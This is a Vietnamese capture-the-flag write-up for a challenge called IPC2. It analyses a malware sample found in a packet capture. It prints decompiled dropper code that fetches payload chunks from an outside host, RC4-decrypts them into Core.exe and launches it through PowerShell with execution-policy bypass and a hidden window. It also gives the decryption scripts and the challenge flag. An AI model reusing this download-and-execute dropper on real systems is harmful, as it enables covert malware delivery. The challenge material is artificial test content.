# Writeup challange IPC2 (viblo ctf)
## Decompile python file `NewUpdatePatch.exe` được source
```python
import os
import codecs
import urllib.request
def br4c3(ct): #string
ct = ct.replace('=', '')
base64_dict = {"110000": "w", "110001": "x", "110101": "1", "110100": "0", "010100": "U", "010101": "V", "001100": "M", "001101": "N", "011110": "e", "011111": "f", "001001": "J", "001000": "I", "011011": "b", "011010": "a", "000110": "G", "000111": "H", "000011": "D", "000010": "C", "100100": "k", "100101": "l", "111100": "8", "111101": "9", "100010": "i", "100011": "j", "101110": "u", "101111": "v", "111001": "5", "111000": "4", "101011": "r", "101010": "q", "110011": "z", "110010": "y", "010010": "S", "010011": "T", "010111": "X", "010110": "W", "110110": "2", "110111": "3", "011000": "Y", "011001": "Z", "001111": "P", "001110": "O", "011101": "d", "011100": "c", "001010": "K", "001011": "L", "101101": "t", "000000": "A", "000001": "B", "100111": "n", "100110": "m", "000101": "F", "000100": "E", "111111": "/", "111110": "+", "100001": "h", "100000": "g", "010001": "R", "010000": "Q", "101100": "s", "111010": "6", "111011": "7", "101000": "o", "101001": "p"}
ct_bi = ""
for i in ct:
keys = [k for k, v in base64_dict.items() if v == i]
keys_str = "".join(keys)
ct_bi += keys_str
ct_bi = [ct_bi[i:i+8] for i in range(0, len(ct_bi), 8)]
if len(ct_bi[-1]) != 8:
ct_bi.pop()
fin = b''
for i in ct_bi:
fin += bytes.fromhex(hex(int(i.encode(), 2))[2:].zfill(2))
return fin #bytes
MOD = 256
def KSA(key):
key_length = len(key)
S = list(range(MOD))
j = 0
for i in range(MOD):
j = (j + S[i] + key[i % key_length]) % MOD
S[i], S[j] = S[j], S[i]
return S
def PRGA(S):
i = 0
j = 0
while True:
i = (i + 1) % MOD
j = (j + S[i]) % MOD
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % MOD]
yield K
def get_keystream(key):
S = KSA(key)
return PRGA(S)
def encrypt_logic(key, text):
keystream = get_keystream(key)
res = []
for c in text:
val = ("%02X" % (c ^ next(keystream)))
res.append(val)
return bytes.fromhex(''.join(res))
def encrypt(key, plaintext):
return encrypt_logic(key, plaintext)
def decrypt(key, ciphertext):
#ciphertext = codecs.decode(ciphertext, 'hex_codec')
res = encrypt_logic(key, ciphertext)
return res
def getRekt(link_where, droprange):
payl = ''
for i in range(droprange):
urllib.request.urlretrieve(link_where + f'/data_{str(i + 1)}', f'data_{str(i + 1)}')
with open(f'data_{str(i + 1)}', 'r') as f:
payl += f.read()
os.system('del {0}'.format(f'data_{str(i + 1)}'))
return payl
def Decryptor(rac, kei):
fin = decrypt(kei, br4c3(rac))
return fin
def retr(specif, ficeps, string):
r3v3 = b''
idx = 0
while idx < len(string):
if ord(string[idx]) in range(ord(specif), ord(ficeps) + 1):
r3v3 += ord(string[idx]).to_bytes(1, byteorder='big')
idx += 1
return r3v3
rac = getRekt('http://192.168.111.130:8080/drop_data', 😎
string = """ÆÍ �ÜùïÔÓ©��·è���Õo¿�ÇÎ�εöæ¨��¼y¶øä�íÙß �ÃÜiªórÄoʵs�ÇÅ �¿×¥eɪ¢À�r�×
i¢ÿ½hÃ�ØÕsÛ¼×ú
÷Ü«�£aÞÈ�ä´ñ�êÊÓÆ¡Ð�ððî¬h³ú®ÅÅÉÛµ¯"""
specif = ' '
ficeps = '~'
with open("Core.exe", 'wb') as f:
f.write(Decryptor(rac, retr(specif, ficeps, string)[::-1]))
os.system('powershell.exe -eXeCUtiOnpOlICy BYpAss -WiNdOWstYlE hiDdEn .\Core.exe')
```
## Lấy data biến rac trong pcap với câu lệnh
```tshark -nr /mnt/c/Users/ASUS/Desktop/Capture.pcapng -Y '(http) && (frame.len == 1078)' -T fields -e data.data| tr -d '\n' | xxd -r -p```
### Chạy lại code được file `Core.exe`
```python
import os
import codecs
import urllib.request
def br4c3(ct): #string
ct = ct.replace('=', '')
base64_dict = {"110000": "w", "110001": "x", "110101": "1", "110100": "0", "010100": "U", "010101": "V", "001100": "M", "001101": "N", "011110": "e", "011111": "f", "001001": "J", "001000": "I", "011011": "b", "011010": "a", "000110": "G", "000111": "H", "000011": "D", "000010": "C", "100100": "k", "100101": "l", "111100": "8", "111101": "9", "100010": "i", "100011": "j", "101110": "u", "101111": "v", "111001": "5", "111000": "4", "101011": "r", "101010": "q", "110011": "z", "110010": "y", "010010": "S", "010011": "T", "010111": "X", "010110": "W", "110110": "2", "110111": "3", "011000": "Y", "011001": "Z", "001111": "P", "001110": "O", "011101": "d", "011100": "c", "001010": "K", "001011": "L", "101101": "t", "000000": "A", "000001": "B", "100111": "n", "100110": "m", "000101": "F", "000100": "E", "111111": "/", "111110": "+", "100001": "h", "100000": "g", "010001": "R", "010000": "Q", "101100": "s", "111010": "6", "111011": "7", "101000": "o", "101001": "p"}
ct_bi = ""
for i in ct:
keys = [k for k, v in base64_dict.items() if v == i]
keys_str = "".join(keys)
ct_bi += keys_str
ct_bi = [ct_bi[i:i+8] for i in range(0, len(ct_bi), 8)]
if len(ct_bi[-1]) != 8:
ct_bi.pop()
fin = b''
for i in ct_bi:
fin += bytes.fromhex(hex(int(i.encode(), 2))[2:].zfill(2))
return fin #bytes
MOD = 256
def KSA(key):
key_length = len(key)
S = list(range(MOD))
j = 0
for i in range(MOD):
j = (j + S[i] + key[i % key_length]) % MOD
S[i], S[j] = S[j], S[i]
return S
def PRGA(S):
i = 0
j = 0
while True:
i = (i + 1) % MOD
j = (j + S[i]) % MOD
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % MOD]
yield K
def get_keystream(key):
S = KSA(key)
return PRGA(S)
def encrypt_logic(key, text):
keystream = get_keystream(key)
res = []
for c in text:
val = ("%02X" % (c ^ next(keystream)))
res.append(val)
return bytes.fromhex(''.join(res))
def encrypt(key, plaintext):
return encrypt_logic(key, plaintext)
def decrypt(key, ciphertext):
#ciphertext = codecs.decode(ciphertext, 'hex_codec')
res = encrypt_logic(key, ciphertext)
return res
def getRekt(link_where, droprange):
payl = ''
for i in range(droprange):
urllib.request.urlretrieve(link_where + f'/data_{str(i + 1)}', f'data_{str(i + 1)}')
with open(f'data_{str(i + 1)}', 'r') as f:
payl += f.read()
os.system('del {0}'.format(f'data_{str(i + 1)}'))
return payl
def Decryptor(rac, kei):
fin = decrypt(kei, br4c3(rac))
return fin
def retr(specif, ficeps, string):
r3v3 = b''
idx = 0
while idx < len(string):
if ord(string[idx]) in range(ord(specif), ord(ficeps) + 1):
r3v3 += ord(string[idx]).to_bytes(1, byteorder='big')
idx += 1
return r3v3
rac = "4DoY/XevHqqD56tnZXSJRANambtUCZ6Sql/izrcsYEZFuZse8710h3II4QiM63yKyHFGrgpFps2emZKIlsLSgQL0SHNgo+iQHJ4FYA2YFVbTDD30N69pRejCy8oR5I0F7/tpgdTuSdgRrSl4nYQd7GpSH4R9DVHo6rPlqd+or38K3oBPX0aa+kLILv4zS5TJreEm8zUYyd3cre4wdOygKW8UMjPAt9Yu/ktvs2ch2mw0VEY1kD3BI2qSUymhbLYhJOCQn03S0F5HSKnwFhUXgcW3TNBmL+htE3jKMrox88dCoZPSpdQ8mCMPl/R4fQSA1yu9CKx+zjgwcx0m7QgumPB4GSPEbfdX8GcYsEdC0kuqprd7zwSR36SKXWNfCnlUpIVq4+lEJI4Rkl1Oq5DbcbYXi8CA5Ch1drd3WEzGj+BUcPLDTc3ydFBQOqTL+zviuLHyTfm98OA+2ZUjNzZvb7sDnZrW3k/ybD9onRCSmG9kxcNBCjkGxKWDmTvpzWSLGIh+eed3ozYcRycf0cX/uLig6azHSBxCrkkghrcwDH51Ve5h7snOYqy0/TWc43h0/F8vpNXgnbrH2bOce3Mdm3FSSD8wMhd3fSMwMYIvWBvsYc62zFZ4Hg0UzgS33mPSSSJj/SP5Dk9OpQ+Ijf5fI93G9HFkqSZu8k9iyA8gCbH3eJiLutnJfKjZfHPkjwznRsQpCp6s4iLgFvfMBEKEAzmdIrfrmzUrDDICsqFfVU9ii7ZGEd3WnHIaIWFplx+ZZy0uIsRfAwZMyJCN5Adfii40JOUwb/qwBCfJR8iT8voZhNdxxigqX+wzuUIGPS2CbYTgWJkbb5+Iz65LHuOvffVp9XBP7KXbav1mpU/ox+j6ghM9SU6UU/Y22OpTLTQd3YDUgzESoYepyI3bc27hIW/6waHGPWqjG7eXOiMpl3ZEq9KJ/uFGWRj64QZLk1spTnxDWvG4SAciL8zEfcRY8AtDtiLeqVMlH/iR6wUQGOGmA0YrTKEdWEEPu1l/HyzNRHiM2RDC8Dn+0d5yzSiUtTCYdgihg6zvRxsb1PWUks70VQdHDJwpyaEjTLD+KqQmkUIxV4Hw3rJ1etPoODCSjrboFnAiW1uxxSKT/DjeLavY+ubDC3VFI7ZxdbyC6c03jKZSpZAB2UIv6Oh0/MsleLTiSioKHTmn32JvKN2Lhx/ievokqQtW8HWHkZepLQjQR2OBWj2D+CRpFHEoE5QT2x4k65JD4spFD5E4eau4koILucTFW3rPIz8JngTkGhzjSTpicNR4Rp9adpBcFzcoK6nrfi4B6Emf1yCw3IrHTs5c+W2qMs+dLLcu4uxpFscIIsu8/DmZkBUuU8H0ctm2VsrIQnkvADXjbhUGCnwMQVTwwNQqls6dFhOQ0sNIHI7sfPxJEueDmsaw6MeQx7CA/qSJ1X9iCznXznXZTRqPtCUJUyZQ5aeKzeNn/QMWQKmtf/oIAszc4ZN+xfSfRVpexb8c1aWppF7/VxIUETJUjn8IbqS+hfeRawiODU3pqwkycZqZKQf+8Fb4dry8IS9eN8MkhEx+1zyZUsaQ6jcHyAjJ2355b4l/pJxfxcicqaosAZ2/HJc21/umdgPft0/XGlMLG+VzUklR2iohl2GTR2x2xXEW4jB9pEECkwBqkj9SFXBPXfok8daOpKLUbB5CT4Dd9Vhrr/YD1E4hybr/4LvS+5ewsvKfE8Qn/VHojluZzKHTjiOLb2lE0ayXMN9g8+AUroeWBQnl3Ai/m7eU8JJxWcgjuCeIFCgGdMO4Yw7Fk04kra4eEze7GmCFa5vq4u821q5Z3TgYAGYIdDUwpQ+rG3LiBKffN9Xkq48VRMnDHHXf37/GjQKf5LJd6G9LWy1b4huhInN8U/+6uELb8XKIbBXvNoN9B1FC2IV7k2yg/8kFCP8aObKwGurfd7GzHOfAi7dhFY3Zjr3uVoNVgSSzegkG7fo6My4UTriDrQzIDfvEIBh6arnxfN3Jxmhh7PLhZkyL5sF5m4Etl7xMZxFYSEA7cV53U0yleTPZ+n59RfjzewnnmjgbBTeiF5BC0e6Q/f4PT5eQ34pEa/cxk3oZSRmf+xE4NbpJ7N6SXRGm6t0cSr1A1X4o/uYzXb/u8lmgDhPfOZLoNKoFaMxjeKvpI5ix4r7LbE3V1dxvofTiIUWQ1IVBn9i3Y/iwwziMScZvJ4jekpKMGSTciOC0BJXKZzlEwC1ROA26sFBzgUbCRFEpTwzJfVeISHKFbpktqv27TgzPragNVgvOwZtTQji442cqcUx5XgaZUeYyTnv8CVD0694JpxEVE0QxLqCBx5+3LIHV10lZrtuup18iO8PuGDdCIo1JL4HyGwm6AABeA2RLRVzqM2jfWM4tAPnc9lNi7EQRkd9y+18xq2bd+btOg4ZyGOxG8z7YkXcn3sIUzkW0W6yU5B2XektDGLJbRHe2lk7i3Zjg2NsVV6hUkSin6qqbkDn9UCd4gXFQTd9+xqhfePN7oZp8BZgJ+hDUDbhLVzmi7DJUMLbP9bKwy9bmHscDxMP3J5MGGKkdOJkmlKws+07qmAip5Ft2aUzmsC2SznOgCEuEJxX5DfjLRn8Y2vIW3ZyyYXW0wGcI3K9ciiZPt8zGyoeZC/Wj2HnKeAqc5SF9W2Heu+rUXvXPDGNxKfYrgwQNMvIOYyzYnc7gHPDF2ZHKGOeDs/JdCXs6YZutbwll2ma182kOgxhnplAAw/Lfziuob5XQaOZZq6KuIP1c6+sNfluI1N/0gj+PjCtVUNDxe6eoYFxNc7NucSSRnwC7/Z39gwLXvkebxLQCjX2ecqkQcsXmE8O4OyYQemqZlAMv13YcG+gJ4fizfcVJkolKZdI88RrXLzR7Xg/rVNvHjMpR1kEYeASSzg483HjCy4GCzqDSSAxGsVi+wR0abWXad7XpczwxHRLCMTbaC+pVAqkeinY/L3kNlkT3xSyjP8prYRNi2gtWMTecciRtIN+ge7kVFa01LioWWCZEQyv37iQ6FWLOwzsBrGXFiPTmMZGi5mrn/cC0UDte6tTBTTaPV69Zti57Aiwu4QUxXzJUkpkKC9tPzm/HCcXLEoageNii+srQWdWFDvV6TcrpO3zYSp+bLrytsLaImSlTiBt6nN2aaCV/+wEKwQHD1j2N7SgsfQNNO7R14r8ggjySDqLtzKHiz61fth0TvU+Oe/PWz+I+LIcvxGLDL3TjZItJcYsEBf/LNNkowwftCcnMJ97NSIEvtHQNKw7TVlp9KCwT0Asrcg5w6JX+k4Az1olSajUEEkvMt1L6YIPFXMrnNluGFQwj509SDamt6sCxVaxHeArdTz8xk1zlWu4ogWrf9hZanH80SEhH1toZuRIj7hk2WK+TWEmVxQTPSLXxS1524hQCqs6rdSS2MRgeJdaBEhJLCNSVoiJzT8cgLLoC1K/3N3ZDrCJW4u4zljJNO4N5GcQa6keIwF3Jx8r4ozJXMpU0VsHWlT3cVSpXRhzglfWQ9FjGw3zp3PVNwjQVCng8GTQNKbiZJrb7A0nZl9eTpcGN4g+O6zm5szI/xci8qICPEc2ldLBbR6nGn92kh1qKxcyGIlYUIwD4ofoHs1gZkLBwV4VURLLlo8WwWZSzQZK7RVLKV/GAwyZo3/9ABMAlKyRUAAmSprv7AKa6TzPEmRNhKD6CR9JWIS/tJsq+6jg2DEg/IzyAb2dY/UUxKLqY3OdnH0iB11ySP0VL8MaGaRrycrXjwoTZrlhUHlHOdOl5KAWONJeT707ZAj1C9Gqcd96xFMPLRrh7PcB02jnypx3NA13c8S3L4It6+isYNaNwIVaZikYYJy8c4z43BuhATcSoKSSADnR2AOCx8Q8SlQMVAkan/qBdErIdWXf7qtpOwqp5/SbWsTLT51PxsfMOnwxKh0HlI7bGfjoY4tBsYXEn3NuFY90ZgPPx5svZ4sJLZzh5GoPWHFY9n6vTifktwuPPDt4H30StkgkaqceRSMFE25T3YWxoWC3hpWffLb5mrTOrhybOOI3UkZZn5nXXciZm/hEBJF5zOxv02/99iZ0+ms16W20YT2hr3cMG2kc6tERol3Hj5hrg3LFFJ/wrpPgwZRo2SFgf/VZLWwLTa4Dr9Kter+kzf6FY9EdSO+B88pC9AQ/tesdrZXJNBwBhBQiDCfwCTgVRcF0ax9NPYPViS2lu1PXcHmo62Bs0CpbnKFLktLpHZO1Bjp/xhEPoPIn5iBZO0Sxb4ebI4vd2sQORDUEx6oG5LqOoHlnDTlRkiMwMLU0enhT6+Q8K9wLLDNSr6yAHlbzbjBZ9gCh1kPs4G2iVRfiLqODOlipHhI4lF8vORSBc6IJP6p1WXuxxAlOTYhuvY2n43dZdxMTYNDkRDcCPV8X+NiTqVJsuozfBKYhPZgLVNhjtWI0wmKHuXibAZZU/zDjD/mWlCFlyV25eKHnceOCXZz6v9WKo5Mjt5G0Q9DB/2XBM07KLkODmddhscS+wCw9Bt2o8/gXt6ybEAAk/zPlF+y/RvAl/TwK65h4h4L49gTzLLt+ggUVnxYqwSKVaI1d6YSpHT66Y8hw1Iw90hocZitDBGWrR4S1AAmcHFA7hh5b02XE20RPxrxu3+avQOZouYJknlIvyCeRY2Dm0Hm8EISJoLOVWiI2iVjOgnJpRtOseAtW7U7eA7juWYyhbMI4HBWq+8mpklez2U4mq7TC82UqY6WvViTozHM5S67OeUlQdS3zHAlYRL8AEq78/MzerZjtxClVwwwybWHXXfpYFcY4ENpGIGTim5EHHLoboyvar1PVrlxfWCRg8cgcsnP2IoJEned5HqQsHM7sj+hyZ6i+0D5yyY0XII3aHCShhsrzAkt66JocHSVhfy9v8FEDkvTxl5nFM8GO4vzNyPvMQsTOhw4AU9qZ0KtQ9GxKcXHSD8jJ75UAq1z7WRs1x9uJNRPykheQ3XvpGi5foAxoJwQ065H8DtS46M+4BM877IJrTiAOXy2ueTFxVRAA7jnoJpaJQkRe9AIAEXbAWlLhYWI0ovEltn7RAqP2Lm+bCF7jM92PUV4HSJs5tHtdL6al8do8ENdehKPnR0EBSmOtCm4YGe1KKkiI67POE5/TV0KZejiNk7/McwEMm/aMUACxlSXXm+jcfN+2kiKnDLgdzPMOD4xMFYYKzZus75N1/WY/6iZ0D1hxdZU2Wz/1146ltHvmIRGkpVIiDGOTAo/HEfz9CNXG6wwXvhi9/F57FHkQ+lEdns9ySMH49+062tFit/FebF/hOVTjd0/ImX1vofueOv0UyWY+dv6FnpH9SlR5l5Ch5ZxOt9QFJXnMMFMCYS8ttJuqB6ThkcEg0as+/o1OivZHWfv3gLcipNOoyUSKdexru+9cnKruN00+ioddYb/KNi7hN5ejp1Ttu0JkvWpdG1LPeUnI6OZUbCzYLzZpEDdlNjHPNFPGQobhbvq9RXsaHP1ZeKIJkFroDsij9ruaA4eWQF6l2z8kmzZCPfIrqNFZKhKn47c5juZJ2YKjwdr/NQhrspo6Vedrzk+v2yX3okb8UjVdswi8a4VMYAon5A74vrbEBv+pswoNpUDaGg7/EHygRnQjXnxqJ5HwZrhAWt0m5ZL8y/t0gUhTF36E9OO4TCsB63UsaMtn+UmuOiASe4e1TKRSnVzZv/GkfH4K66zSmllOYHXDJrISigAlEz0CiwiB5PqEIIlWjvl+fIx5JTgZIELIE2ufk7q0JhwavVIjqMeih8Skaa6lbaBrQjzG5iPmPh1EZe/nAcW7XrDS2pM733QxQiJ2Aln/r2FOZFuBUA85pV8GZ/VresfZYWdyDXhxeA/FSZ3SQzyhWSSN3Yt3QImK8A3yWz5wb40g56ofnVrKFaBeSQczYCLVVjY7f2lYb0w1NUbnVSTdGFY3PKpDzGr51f/h9wyTeBfK/HaPPRn3r2Cx9wu5JEkqkHF6BldbthkInCXyjqDEzaTojDs7zmwb0SDlJ4kwLspZWHVsnTSyjQVd/kCgqcE9Tr7pD1PIqJbE30KEGSX3DlF36oxWg8Kq6fEBsGZgiHnrqtnELN9CelRscDRglNubpz9V94xh2/uZ7iiaZfrSj5HSrNjWtHRw9YXOwvQkxqHNTQZDwaf+ckbEqnYBpR1wCzhgyM300iVowZgL4kGn/fwtVFHzstYRw+VNdQgJTUiK5tSJ61GVKYC5U9/uBNr4A9qAeSgkv3obC9t78wgTGrqjJwSNYwIRZxBfZJ0J1z3lqz7GDg+opGJgstQvZPOrobFcj/J1OJnlTJ+cTzpqkb+uy+XB99LA+ZJtH6c1PVcQxvRGvJAFOxzLxMo1mbGakCOEYykDXBB+ceruuRQI7QF40CFRJNIJeqw8gxnRUBWDP0G4kAIHpLiaLHI0so7/nA4RzT5nHYgNlCiuFyS08M2CJ6USssNXtYgZAcelM4RftqtvweFrjkvL84aO32j90SWLF1hSVAmFj9tabAgDqKZg/lK3gcLSVNbMhVHBlsPqWu81FR02nDhK9t7a5nAPCtOlzrj4DM2bhpMs8EC2/1VK6R512tGpyBVUmZXvZQA94HGkO9KAhb77tqzeavtS+iP4ZNkSg88AKzydb5N7oaKCMsY2n6U7PSA5sKOYKuHshU/9K9oCeqZjRg2Zaa2l7rX7TcrzLKynZqlkncfLTa4Fe9gV4Dd+xNjQsHucEfh/jsFTJSrwgdPISYnqJbmgb/wdnHXGzlZecZ1AjJoqQgJFtOuYCvZqHI0qIGhy2ZKr9pn6xwYTn3v4EVU+gtiC5YLZEvgS4ywiooLLxO+/UzorDcMWTBbdU6D3igRDEmEhEN9jsK1YXRTB4p5bbRPEJ+rdCyeOGKyd6ZBhYg1XyO6y9ChS/j1etvvEOAO9aW2IOcCASCzGtBuDQ6vlzHN4x5x5riMQncXcUb6oB2Of1+lUrkZOUy4DmUUv75AeaW9BUWVIXb7S0b3TBWjRX2WIxSNRdujV4S6KF0j+fPMEp3ygPlgmswC7+FaXxfUPKwvSmGjnXYxHI4UaYyIXlInKzQiEeVSHjBcO4PLTD3sbfAq8N762Z+nnBB0pr+d2nOrOETnfYBVI1lXPldxfTbQM9oI8suBHcGwlzbVRtzh6t0oKxeKSQjzIM9Ds8FlxoiRlGPQP/aoymw38K8l2UMSGlYqcbYVSjTRC26AnMcaIQvZxLEyDy4eUY8F37QL/0CVTTv+5X3AEBJlmRdW357gc1bcfl7RAac3UBEYa5i7U4VGbvf0g6DrM+zCEP4kZWG99/UnAKYDAC+coKRhph3yPAqOwTxkBWO1mcn3JE3hOZLX9/K3vs89y8Ef3yv0XCxD0AjWhLhsV6qEGy1h4mD9BNBIGflIHfHEueU3HVq25yns7n5Yq9LjJadwZiX2hQ/AtP6Vfs7JZKfuZpBXitQSFtapmSgSw8jNA6tsMpf1/3VSOHaAkLuIsXXpPnGpowHwOEdtX9u2H+8nNxRDSP5iegf529JxwEc+Fklv66k4gsldLcBQHNRCqttR5IlCtgi0AkBT7jvGHlRtBCuqv3xWClGKGcBUDZ7DodbGjMAT5UCdPdxuHbWEsv3ogXh0ocZFky2HjH6ju0cMSTKsxq60tIb7kDpStHwRSgFG/Yrt/qzgikrFF2LQQ4Y43aRCCRu2FUBO1hpIfYRJTIhg2AfUJ8o9XbMUqH03OOuz3MUU/QAg58syG/wLRv8mUzzBWKryw2p1qdKW5tD2BJkskSMqzDAbT03HT0zVw1Od5K1lr+Py2YM2oamlq6KA0lTneNArllV1kG4qqBqZIdsPHfgpwhgKUaPUF26/RtGSDwdEKEyBmOudOigBT9mYqRfllxeRY/sF04p/OEN4ce8TL9wHhRw9uSmcwTIrDAHg0AbKG+7+Nwo580jl6+imIIDUWLWJG77UXsD32hoirVgUKGXmDEm2ET6/4gEUUXx2/Olo4XTeuxmic82/n32vKb5fSssy8+ffsXGnem5T6p8VqZsoIcCyNEwyWa2orvRZMK4544kEeKVM/RLcatBJvWNigcncrB2V+ePAvemGuCWnjy2Gzqfk9aokMw5Ff6uVuUSvXIMM/MdwcbgRBK4vMzKVxsmhvt5hGtW1BqDgUUlIPX3L07TJISxWtJ7Zfpc9x8VaU5gaOknhVnuAuK0hxxRCLLURmGX2eyTd8eCm56fez5zh8MZgr3"
string = """ÆÍ �ÜùïÔÓ©��·è���Õo¿�ÇÎ�εöæ¨��¼y¶øä�íÙß �ÃÜiªórÄoʵs�ÇÅ �¿×¥eɪ¢À�r�×
i¢ÿ½hÃ�ØÕsÛ¼×ú
÷Ü«�£aÞÈ�ä´ñ�êÊÓÆ¡Ð�ððî¬h³ú®ÅÅÉÛµ¯"""
specif = ' '
ficeps = '~'
with open("Core.exe", 'wb') as f:
f.write(Decryptor(rac, retr(specif, ficeps, string)[::-1]))
```
## Sử dụng dnspy để decompile
Viêt lại code C# để decrypt
```csharp=
using System;
using System.Text;
using System.Security.Cryptography;
public class Program
{
public static void Main()
{
string command = "TangerineYWEyMThhNmJlNzBjMDY5YjU4YTRlOGViY2NiYzQ1ZGM=9QM8aVkrYelwZAQa/6hRVH9d1Pnj9avOITGadElGdhI82TsJ566sp+WfqpaT3Gq+WDl7WkMmPzgoU0VHalEnTQ==";
bool flag = true;
if (command[0] == 'O')
{
command = command.Substring(6);
}
else
{
command = command.Substring(9);
flag = false;
}
string instr = command.Substring(0, 44);
string s = command.Substring(command.Length - 24);
string instr2 = command.Substring(44, command.Length - 68);
byte[] key = Program.modifBytesString(instr);
byte[] array = Program.modifBytesString(instr2);
byte[] iv = Convert.FromBase64String(s);
Aes aes = Aes.Create();
if (flag)
{
aes.KeySize = 256;
aes.Mode = CipherMode.CBC;
aes.Key = key;
aes.IV = iv;
aes.Padding = PaddingMode.Zeros;
}
else
{
aes.KeySize = 256;
aes.Mode = CipherMode.ECB;
aes.Key = key;
aes.IV = iv;
aes.Padding = PaddingMode.PKCS7;
}
ICryptoTransform cryptoTransform = aes.CreateDecryptor(aes.Key, aes.IV);
byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
string @string = Encoding.UTF8.GetString(bytes);
cryptoTransform.Dispose();
Console.WriteLine(@string);
}
public static byte[] modifBytesString(string instr)
{
byte[] array = Convert.FromBase64String(instr);
Array.Reverse(array, 0, array.Length);
return array;
}
}
```
Thay command bằng các chuỗi sau
```
["TangerineNjNmZDBhZTA0Y2NiZDkwOTUzNDRkYmZiNjg5YjU1N2Q=wyUmYR2lTQg6VVKYOdBqdA==MHQ1eUhoQUBOUW5lKUFJSA==",
"TangerineZTU4MmYxMmNkZjljY2MyYjQ5MTRkZGIwOWNlMGMwMzE=c52cPan7syNuXYzd5LeqGg==ekonMjhFNFBbYk9QZEAuXQ==",
"OrangeNGNjY2U0YzMwY2M1YzdjODBhYjQ2ODc5MDc4ODdjYTc=z8eAC+qJLmvcBIsYzfsr6w==MShdLmFBQXRgbSF8fEtVaw==",
"TangerineYWEyMThhNmJlNzBjMDY5YjU4YTRlOGViY2NiYzQ1ZGM=9QM8aVkrYelwZAQa/6hRVH9d1Pnj9avOITGadElGdhI82TsJ566sp+WfqpaT3Gq+WDl7WkMmPzgoU0VHalEnTQ==",
"OrangeNjQyM2VjYmQzNDllMzcxODUxYTQ3YzI0OTkzMzU2MTk=c/Vei7WoicK2KcdQM0xffb+sDRWt5JhSxW5UoWaxYHsQ3v3jsaTZ055FVSkzF7/jYmojXnEiIX0pJ284PzohWA==",
"OrangeMDZlZTNlNzEzZjBiYWZkYTI4YjRlMDM5ODdjMDFjZjg=/PWhHxAW0VXJ/PWcRq8XtzbyQ0gymME4NjVAYNL1U7KPp5b6SVd8g459VELckswSGlggddKDBkHnrN6MqSHgWAQ5Hxb6BzWxFpsnQm2XBms=ID4lXXp/N300fF1te0phIQ==",
"OrangeMjQ2NmI1ZTk4ZDhmNTRkYTljZTQ1MWQxZTMwMjY5MWE=cGMyqJiqPFKNw7I8LNtWJQDfTJMBY6GRT13SK5v/7AQ=dkRmISIxMV99TGZ8clI0Qg==",
"OrangeM2Q3MzlkZmFjZDIyZTViYWIxZjRkMjkzZTJhNWFlOTk=/eyhd8CFueVJ7IMnUPJVdcxbQiPmjLCnR+VST6E9owk=LDlZZGB5Y0tBQ28zV3JbbQ==",
"OrangeZDc1ODRlMGJhMzViYjhmYjdkZTRjMTFkMGQyYzljYmM=YBgFkL0d4jDL2MFqWiabe9iG4Em+m1OYeU6Kw+fCu7Y=UyZ1OH0neDJuZSYjLDU8ZA==",
"OrangeNDA1NTgyNWE2MWQ5MzA3ODJmNDQ5NWNiMzg1MWVlZDA=4txrI3nrgb/RJMdI6tYx/9p1Gvs76+r200AwYjD9rTs=Jk07QltWWHA+b102K1d1Nw==",
"TangerineYTRlN2U0ZTdmZjViY2IxYmEyMzRhNWU1MzBiM2VkOTk=5dBprptGmjMb0uu4llH/KA==TUolaH9WXDhXdUJvcjgyUg=="]
```
Được nội dung của file password `b'](leZd*PkwSY%D3a,fUQ \n'`
## Export file `Encryptor.py`, đọc code và decrypt ảnh
Code decrypt
```
from PIL import Image
from hashlib import sha256
import random
img = Image.open("IPC_FlagENC.png")
newimg = Image.new(img.mode, img.size)
pix = newimg.load()
password = open("password.txt", "r").read().encode()
print(password)
key = bytes(sha256(password).hexdigest().encode())
random.seed(key)
for y in range(img.size[1]):
for x in range(img.size[0]):
r, g, b = img.getpixel((x, y))
if y in range(686, 730) and x in range(450, 1480):
r ^= random.randint(0,255)
b ^= random.randint(0,255)
g ^= random.randint(0,255)
pix[x, y] = r, g, b
else:
pix[x, y] = r, g, b
newimg.save("IPC_Flag.png")
```
Flag{1nt3r4s7r@L_p3AcE_Corpor4t10n_S_E_C_R_E_T}
Sign in with Wallet
Connect another wallet